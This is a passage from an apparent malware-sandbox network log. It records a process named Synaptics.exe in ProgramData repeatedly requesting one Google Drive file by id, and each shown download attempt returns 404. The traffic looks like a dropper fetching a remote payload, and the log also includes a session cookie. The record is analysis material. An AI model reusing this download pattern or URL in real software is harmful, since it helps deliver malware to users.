                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:33 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-b7P5mgJyLY2qGnXLszQsNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 49881 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:33 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:34 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Ay4RxBpc96w1vGaisqgXZN6kJlSI3CW79YcffGF3PvAOJmsFfwtL5PIqpHjCQVifj
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:33 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YHmc-ArVDg9jrLUeHyxWNA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:34 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:34 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="0vm53CZYHGf10-ua68xulQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:34 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 49882 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:34 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:34 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:34 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Jey-Zvd9GnpExHvgFumY2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 49883 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 49884 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:34 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 49885 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:34 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 49887 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:35 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:35 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5n2jGEQCWLlQS-h6XieblUAo3rIkMj6uEeYyi8ldX-QWx4vY9N6Mkjw5-Sx07s_GvK
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-jjmdGFN99Fr0H8FCWxmiWg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:35 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:35 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="i4YwrAuG6u03n7Fn1SCcew">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:35 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 49888 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:35 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-i-OYNHEsv-x8sZLWLaMSaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 49889 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:35 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:35 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:35 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3mkgeWO1zxtsaOr9qLSXww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 49891 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:36 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:36 UTC | 1242 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6sEKpj7K2JTFM2i5m0S7mYHMXxHbY36vpIt1vd315tHLee4YA71LlDnZupTa_o8C0
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-InuDqAYtm78iwzwKmEjFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:36 UTC | 148 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not
2024-12-30 03:59:36 UTC | 1390 | IN | Data Ascii: Found)!!1</title><style nonce="3Jw4tCbq9hCfqa6N22TdoQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:
2024-12-30 03:59:36 UTC | 114 | IN | Data Ascii: Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 49892 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:36 UTC | 344 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:36 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-u5sY0NXiRWoFp25zcoRHrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 49894 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:36 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
2024-12-30 03:59:36 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4WHAfbb6IRukLwpSyevePuFa4_SwhQJjEJNRHx1Q3Kri0GfJRN-pdJ1paAks6hZvA2f4n-uQk
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:36 GMT
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-HXdeOlWWtJ0GBordlk7n-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
